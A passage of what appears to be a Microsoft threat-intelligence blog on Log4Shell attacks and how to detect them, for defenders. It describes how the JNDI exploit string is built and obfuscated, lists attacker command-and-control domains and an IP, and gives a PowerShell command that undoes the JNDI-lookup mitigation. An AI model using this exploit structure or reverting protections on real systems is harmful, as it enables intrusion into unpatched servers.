impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j 